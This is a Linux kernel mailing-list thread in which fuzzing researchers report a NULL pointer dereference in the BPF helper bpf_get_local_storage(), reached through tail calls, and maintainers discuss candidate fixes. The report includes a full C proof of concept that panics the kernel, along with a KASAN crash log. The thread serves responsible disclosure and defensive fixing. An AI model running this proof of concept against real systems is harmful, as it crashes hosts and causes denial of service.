GPF in bpf_get_local_storage due to missing cgroup storage check in tail calls

1 view
Skip to first unread message

Yinhao Hu

unread,
Nov 24, 2025, 4:16:14 AM (10 days ago) Nov 24
to Daniel Borkmann, bpf, dz...@hust.edu.cn, M2024...@hust.edu.cn, marti...@linux.dev, Alexei Starovoitov, Andrii Nakryiko, hust-os-ker...@googlegroups.com
Our fuzzer tool discovered a NULL pointer dereference in the
`bpf_get_local_storage()` helper function. This issue can lead to a
general protection fault when executing specific BPF program sequences
involving tail calls and Cgroup Local Storage. The verification process
for `BPF_MAP_TYPE_PROG_ARRAY` ensures that the Callee is compatible with
the map, but it fails to strictly enforce that the Caller has allocated
the necessary Cgroup Storage resources required by the Callee. If a
Caller (which does not use Cgroup Storage) tail calls into a Callee
(which does use `BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE`), the Callee runs
in a context where the storage pointer is `NULL`. The
`bpf_get_local_storage()` helper in the Callee attempts to dereference
this `NULL` storage pointer, causing a crash.

By manipulating the `BPF_MAP_TYPE_PROG_ARRAY` ownership (assigning it
first to a program that does use storage), we can bypass the initial
compatibility checks and insert a storage-using program into the array,
which can then be invoked by a non-storage-using Caller.

Reported-by: Yinhao Hu <ddd...@hust.edu.cn>
Reported-by: Kaiyan Mei <M2024...@hust.edu.cn>
Reviewed-by: Dongliang Mu <dz...@hust.edu.cn>

## Reproduction Steps

1. Setup: Create a `BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE` map and a
`BPF_MAP_TYPE_PROG_ARRAY` map.
2. Establish Owner: Load a dummy "Owner" program (Prog C) that
references both maps. This sets the `PROG_ARRAY`'s owner attributes to
expect storage usage.
3. Load Callee: Load the target program (Prog B) that uses the storage
map and calls `bpf_get_local_storage()`.
4. Load Caller: Load the malicious caller program (Prog A) that uses
the `PROG_ARRAY` but not the storage map. The verifier allows this due
to a permissive check on tail call compatibility.
5. Update Map: Insert Prog B into the `PROG_ARRAY`.
6. Trigger: Execute Prog A via `BPF_PROG_TEST_RUN`. It tail calls into
Prog B, which crashes upon accessing the missing storage.

## KASAN Report

The following C program should demonstrate the vulnerability on
linux-next 6.18.0-rc6-next-20251121:

```
[ 87.795255] Oops: general protection fault, probably for
non-canonical address 0xdffffc0000000000: 0000 [#1] SMP KASAN NOPTI
[ 87.796199] KASAN: null-ptr-deref in range
[0x0000000000000000-0x0000000000000007]
[ 87.796952] CPU: 0 UID: 0 PID: 350 Comm: poc Not tainted
6.18.0-rc6-next-20251121 #9 PREEMPT(none)
[ 87.797863] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX,
1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 87.798828] RIP: 0010:bpf_get_local_storage+0x106/0x1c0
[ 87.799403] Code: 48 8d 7b 10 48 89 fa 48 c1 ea 03 80 3c 02 00 0f 85
9d 00 00 00 48 b8 00 00 00 00 00 fc ff df 48 8b 5b 10 48 89 da 48 c1 ea
03 <80> 3c 02 00 0f 85 88 00 00 00 48 8b 1b e8 58 8c b5 03 89 c5 3d ff
[ 87.801321] RSP: 0018:ffff8881042675b8 EFLAGS: 00010256
[ 87.801860] RAX: dffffc0000000000 RBX: 0000000000000000 RCX:
1ffffffff1359c34
[ 87.802583] RDX: 0000000000000000 RSI: 0000000000000000 RDI:
ffff888104267700
[ 87.803356] RBP: 0000000000000015 R08: 0000000000000001 R09:
0000000000000000
[ 87.804074] R10: ffff888113aaf000 R11: ffff888113aaf0bc R12:
ffff888104267930
[ 87.804816] R13: ffffc900005c7000 R14: ffff888104267730 R15:
ffffed10227ea641
[ 87.805563] FS: 0000000029cbc380(0000) GS:ffff8881911ff000(0000)
knlGS:0000000000000000
[ 87.806467] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 87.807080] CR2: 00000000004a0000 CR3: 000000010317f000 CR4:
0000000000750ef0
[ 87.807852] PKRU: 55555554
[ 87.808150] Call Trace:
[ 87.808447] <TASK>
[ 87.808703] bpf_prog_09b98cd0bcd009a1+0x1d/0x28
[ 87.809209] bpf_test_run+0x47b/0xcd0
[ 87.809620] ? __pfx_bpf_test_run+0x10/0x10
[ 87.810086] ? check_bytes_and_report+0xd0/0x150
[ 87.811109] ? __asan_memset+0x1f/0x40
[ 87.811544] bpf_prog_test_run_skb+0xea9/0x3570
[ 87.812059] ? __pfx_bpf_prog_test_run_skb+0x10/0x10
[ 87.813150] ? __pfx_bpf_check_uarg_tail_zero+0x10/0x10
[ 87.813733] __sys_bpf+0xac0/0x5110
[ 87.814123] ? __pfx___sys_bpf+0x10/0x10
[ 87.815056] ? kfree+0x19b/0x510
[ 87.815931] ? __sys_bpf+0x2ca1/0x5110
[ 87.816906] ? __sys_bpf+0x1b2f/0x5110
[ 87.817316] ? __pfx___sys_bpf+0x10/0x10
[ 87.818752] __x64_sys_bpf+0x74/0xc0
[ 87.819134] do_syscall_64+0x76/0x4e0
[ 87.820630] ? do_syscall_64+0xa2/0x4e0
[ 87.821606] ? do_syscall_64+0x24c/0x4e0
[ 87.822558] ? switch_fpu_return+0xf6/0x200
[ 87.823570] ? do_syscall_64+0x24c/0x4e0
[ 87.824039] ? handle_mm_fault+0x1ab/0x900
[ 87.824518] ? lock_mm_and_find_vma+0x58/0x720
[ 87.825562] ? do_user_addr_fault+0x863/0xf40
[ 87.826595] ? irqentry_exit+0x54/0x6a0
[ 87.827025] entry_SYSCALL_64_after_hwframe+0x76/0x7e
[ 87.827716] RIP: 0033:0x41233d
[ 87.828074] Code: b3 66 2e 0f 1f 84 00 00 00 00 00 66 90 f3 0f 1e fa
48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f
05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 c0 ff ff ff f7 d8 64 89 01 48
[ 87.830029] RSP: 002b:00007fffbf5d6be8 EFLAGS: 00000206 ORIG_RAX:
0000000000000141
[ 87.830840] RAX: ffffffffffffffda RBX: 0000000000000001 RCX:
000000000041233d
[ 87.831604] RDX: 0000000000000090 RSI: 00007fffbf5d6cd0 RDI:
000000000000000a
[ 87.832367] RBP: 00007fffbf5d6c00 R08: 00007fffbf5d6cd0 R09:
00007fffbf5d6cd0
[ 87.833149] R10: 00007fffbf5d6cd0 R11: 0000000000000206 R12:
00007fffbf5d7f08
[ 87.833975] R13: 00007fffbf5d7f18 R14: 00000000004a5f68 R15:
0000000000000001
[ 87.834744] </TASK>
[ 87.835012] Modules linked in:
[ 87.835450] ---[ end trace 0000000000000000 ]---
[ 87.835917] RIP: 0010:bpf_get_local_storage+0x106/0x1c0
[ 87.836462] Code: 48 8d 7b 10 48 89 fa 48 c1 ea 03 80 3c 02 00 0f 85
9d 00 00 00 48 b8 00 00 00 00 00 fc ff df 48 8b 5b 10 48 89 da 48 c1 ea
03 <80> 3c 02 00 0f 85 88 00 00 00 48 8b 1b e8 58 8c b5 03 89 c5 3d ff
[ 87.838321] RSP: 0018:ffff8881042675b8 EFLAGS: 00010256
[ 87.838884] RAX: dffffc0000000000 RBX: 0000000000000000 RCX:
1ffffffff1359c34
[ 87.839671] RDX: 0000000000000000 RSI: 0000000000000000 RDI:
ffff888104267700
[ 87.840415] RBP: 0000000000000015 R08: 0000000000000001 R09:
0000000000000000
[ 87.841143] R10: ffff888113aaf000 R11: ffff888113aaf0bc R12:
ffff888104267930
[ 87.841934] R13: ffffc900005c7000 R14: ffff888104267730 R15:
ffffed10227ea641
[ 87.842713] FS: 0000000029cbc380(0000) GS:ffff8881911ff000(0000)
knlGS:0000000000000000
[ 87.843547] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 87.844138] CR2: 00000000004a0000 CR3: 000000010317f000 CR4:
0000000000750ef0
[ 87.844877] PKRU: 55555554
[ 87.845181] Kernel panic - not syncing: Fatal exception in interrupt
[ 87.845984] Kernel Offset: disabled
[ 87.846339] ---[ end Kernel panic - not syncing: Fatal exception in
interrupt ]---
```

## Proof of Concept

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/bpf.h>
#include <string.h>
#include <errno.h>

#ifndef __NR_bpf
#define __NR_bpf 321
#endif

#define BPF_MOV64_IMM(DST, IMM) \
((struct bpf_insn){.code = BPF_ALU64 | BPF_MOV | BPF_K, .dst_reg = DST,
.imm = IMM})

#define BPF_LD_MAP_FD(DST, MAP_FD) \
((struct bpf_insn){.code = BPF_LD | BPF_DW | BPF_IMM, .dst_reg = DST,
.src_reg = BPF_PSEUDO_MAP_FD, .imm = MAP_FD}), \
((struct bpf_insn){.code = 0, .imm = 0})

#define BPF_CALL_FUNC(FUNC) \
((struct bpf_insn){.code = BPF_JMP | BPF_CALL, .imm = FUNC})

#define BPF_EXIT_INSN() \
((struct bpf_insn){.code = BPF_JMP | BPF_EXIT})

static inline int sys_bpf(enum bpf_cmd cmd, union bpf_attr *attr,
unsigned int size) {
return syscall(__NR_bpf, cmd, attr, size);
}

int main(void) {
union bpf_attr attr = {};
char log_buf[4096];
int storage_map, prog_array, prog_a, prog_b, prog_c;

// 1.1 Create Per-CPU Cgroup Storage Map
struct { __u64 cgroup_inode_id; __u32 attach_type; } key = {};
attr.map_type = BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE;
attr.key_size = sizeof(key);
attr.value_size = 8;
storage_map = sys_bpf(BPF_MAP_CREATE, &attr, sizeof(attr));
if (storage_map < 0) return 1;

// 1.2 Create Prog Array
memset(&attr, 0, sizeof(attr));
attr.map_type = BPF_MAP_TYPE_PROG_ARRAY;
attr.key_size = 4;
attr.value_size = 4;
attr.max_entries = 1;
prog_array = sys_bpf(BPF_MAP_CREATE, &attr, sizeof(attr));
if (prog_array < 0) return 1;

// 2. Load Prog C (Dummy Owner)
struct bpf_insn insns_c[] = {
BPF_LD_MAP_FD(BPF_REG_1, storage_map),
BPF_LD_MAP_FD(BPF_REG_2, prog_array),
BPF_MOV64_IMM(BPF_REG_0, 1),
BPF_EXIT_INSN(),
};
memset(&attr, 0, sizeof(attr));
attr.prog_type = BPF_PROG_TYPE_CGROUP_SKB;
attr.insns = (unsigned long)insns_c;
attr.insn_cnt = sizeof(insns_c) / sizeof(struct bpf_insn);
attr.license = (unsigned long)"GPL";
prog_c = sys_bpf(BPF_PROG_LOAD, &attr, sizeof(attr));
if (prog_c < 0) return 1;

// 3. Load Prog B (Callee)
struct bpf_insn insns_b[] = {
BPF_LD_MAP_FD(BPF_REG_1, storage_map),
BPF_MOV64_IMM(BPF_REG_2, 0),
BPF_CALL_FUNC(BPF_FUNC_get_local_storage),
BPF_MOV64_IMM(BPF_REG_0, 1),
BPF_EXIT_INSN(),
};
attr.insns = (unsigned long)insns_b;
attr.insn_cnt = sizeof(insns_b) / sizeof(struct bpf_insn);
attr.log_buf = (unsigned long)log_buf;
attr.log_size = sizeof(log_buf);
attr.log_level = 1;
prog_b = sys_bpf(BPF_PROG_LOAD, &attr, sizeof(attr));
if (prog_b < 0) return 1;

// 4. Load Prog A (Caller)
struct bpf_insn insns_a[] = {
BPF_LD_MAP_FD(BPF_REG_2, prog_array),
BPF_MOV64_IMM(BPF_REG_3, 0),
BPF_CALL_FUNC(BPF_FUNC_tail_call),
BPF_MOV64_IMM(BPF_REG_0, 1),
BPF_EXIT_INSN(),
};
attr.insns = (unsigned long)insns_a;
attr.insn_cnt = sizeof(insns_a) / sizeof(struct bpf_insn);
prog_a = sys_bpf(BPF_PROG_LOAD, &attr, sizeof(attr));
if (prog_a < 0) return 1;

// 5. Update Prog Array
int key_0 = 0;
memset(&attr, 0, sizeof(attr));
attr.map_fd = prog_array;
attr.key = (unsigned long)&key_0;
attr.value = (unsigned long)&prog_b;
if (sys_bpf(BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr)) < 0) return 1;

// 6. Run Program A
char data[128] = {};
memset(&attr, 0, sizeof(attr));
attr.test.prog_fd = prog_a;
attr.test.data_in = (unsigned long)data;
attr.test.data_size_in = sizeof(data);
attr.test.repeat = 1;
sys_bpf(BPF_PROG_TEST_RUN, &attr, sizeof(attr));

return 0;
}
```
config-linux-next

Alexei Starovoitov

unread,
Nov 24, 2025, 12:17:18 PM (9 days ago) Nov 24
to Yinhao Hu, Daniel Borkmann, bpf, dz...@hust.edu.cn, Kaiyan Mei, Martin KaFai Lau, Alexei Starovoitov, Andrii Nakryiko, hust-os-ker...@googlegroups.com
On Mon, Nov 24, 2025 at 1:16 AM Yinhao Hu <ddd...@hust.edu.cn> wrote:
>
> Our fuzzer tool discovered a NULL pointer dereference in the
> `bpf_get_local_storage()` helper function. This issue can lead to a
> general protection fault when executing specific BPF program sequences
> involving tail calls and Cgroup Local Storage. The verification process
> for `BPF_MAP_TYPE_PROG_ARRAY` ensures that the Callee is compatible with
> the map, but it fails to strictly enforce that the Caller has allocated
> the necessary Cgroup Storage resources required by the Callee. If a
> Caller (which does not use Cgroup Storage) tail calls into a Callee
> (which does use `BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE`), the Callee runs
> in a context where the storage pointer is `NULL`. The
> `bpf_get_local_storage()` helper in the Callee attempts to dereference
> this `NULL` storage pointer, causing a crash.

Daniel,

did you fix this exact bug already?

Amery Hung

unread,
Nov 24, 2025, 3:48:02 PM (9 days ago) Nov 24
to Yinhao Hu, Daniel Borkmann, bpf, dz...@hust.edu.cn, M2024...@hust.edu.cn, marti...@linux.dev, Alexei Starovoitov, Andrii Nakryiko, hust-os-ker...@googlegroups.com
Thanks for reporting. I tested the POC on bpf-next and can still reproduce.

I took a brief look at the cgroup local storage code. The problem
seems to be bpf_get_local_storage() not checking if a cgroup local
storage is created. A cgroup local storage is created on program
attachment (prog A), which never happens. Then a tail call into prog B
deference the not-allocated-yet storage.

Just thinking out loud. Maybe a if (storage) check before
dereferencing would be enough? Also need to look more to see if there
are other ways to trigger this type of bug.

Amery Hung

unread,
Nov 24, 2025, 5:46:02 PM (9 days ago) Nov 24
to Yinhao Hu, Daniel Borkmann, bpf, dz...@hust.edu.cn, M2024...@hust.edu.cn, marti...@linux.dev, Alexei Starovoitov, Andrii Nakryiko, hust-os-ker...@googlegroups.com
Looking at the problem a bit more. Here are several solutions that I
can think of.

(1) Adding a "if (!storage) return NULL;" check.
CONS: It will change the helper from RET_PTR_TO_MAP_VALUE to
RET_PTR_TO_MAP_VALUE_OR_NULL, which will break UAPI.

(2) Adding a runtime check to disallow tail calls from a program that
does not use cgroup local storage to a program that does.
CONS: Add overhead to all tail calls.

(3) Allocating and linking cgroup local storage when updating
prog_array map if the program is using one.
Probably the most reasonable fix among the three.
Reply all
Reply to author
Forward
0 new messages